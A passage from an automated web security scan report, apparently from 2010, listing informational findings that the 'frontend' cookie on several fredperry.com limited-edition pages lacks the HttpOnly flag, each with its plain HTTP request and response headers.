Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Limited
...[SNIP]...

6.31. http://www.fredperry.com/limited-edition/men/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:03:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=70dvf76d894ji7klru7v563he4; expires=Tue, 09-Nov-2010 17:03:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's L
...[SNIP]...

6.32. http://www.fredperry.com/limited-edition/men/accessories/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=342ja7lefk74aab9g6o0usja40; expires=Tue, 09-Nov-2010 17:05:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.33. http://www.fredperry.com/limited-edition/men/bags/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oena5tt0klh0432mmfssn6phr5; expires=Tue, 09-Nov-2010 17:07:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.34. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/blank-canvas-stussy/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lb05brvppjjou6cdtjuf6hjt66; expires=Tue, 09-Nov-2010 17:07:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Stussy
...[SNIP]...

6.35. http://www.fredperry.com/limited-edition/men/british-collectables/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/british-collectables/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:06:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3rrrvcljl4ka967bmvqmh4ipe4; expires=Tue, 09-Nov-2010 17:06:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> British
...[SNIP]...

6.36. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/collaboration-raf-simons-centenary-outfit/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7g1qu2sogdcde90e6i6ef81lg3; expires=Tue, 09-Nov-2010 17:09:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...

6.37. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/collaboration-raf-simons/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=g14cq5j3s7a2anivdbk2jrc240; expires=Tue, 09-Nov-2010 17:05:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.38. http://www.fredperry.com/limited-edition/men/footwear/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2slh2p7lutfgf5u2pidtfd50b7; expires=Tue, 09-Nov-2010 17:05:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.39. http://www.fredperry.com/limited-edition/men/jackets/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=nr39n1id0gvvh30m4q71gbdkf6; expires=Tue, 09-Nov-2010 17:04:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.40. http://www.fredperry.com/limited-edition/men/knitwear/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ubioldesmpmb8b7d0a5icgorm6; expires=Tue, 09-Nov-2010 17:04:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.41. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/liberty-blank-canvas/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:06:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=62pm30jf4t8kht82r9ibnp6ls4; expires=Tue, 09-Nov-2010 17:06:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Liberty
...[SNIP]...

6.42. http://www.fredperry.com/limited-edition/men/new-styles/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=54u1qgfkf8qlolg527u9ai43a5; expires=Tue, 09-Nov-2010 17:07:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> New Sty
...[SNIP]...

6.43. http://www.fredperry.com/limited-edition/men/shirts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:03:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t0anp9j4ldm4v0954ma0lbmc85; expires=Tue, 09-Nov-2010 17:03:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.44. http://www.fredperry.com/limited-edition/men/shorts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bn4h720b11dmhiglquk9bd3kr3; expires=Tue, 09-Nov-2010 17:09:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.45. http://www.fredperry.com/limited-edition/men/trousers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i4na8def5unfa7j373r279jl47; expires=Tue, 09-Nov-2010 17:05:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.46. http://www.fredperry.com/limited-edition/men/woven-shirts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/men/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:06:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7fcrhil4hsu1qmf71it9cvvk30; expires=Tue, 09-Nov-2010 17:06:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...

6.47. http://www.fredperry.com/limited-edition/women/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=669gvefst4knokvfv0b7jrff56; expires=Tue, 09-Nov-2010 17:09:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...

6.48. http://www.fredperry.com/limited-edition/women/accessories/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: frontend. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /limited-edition/women/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
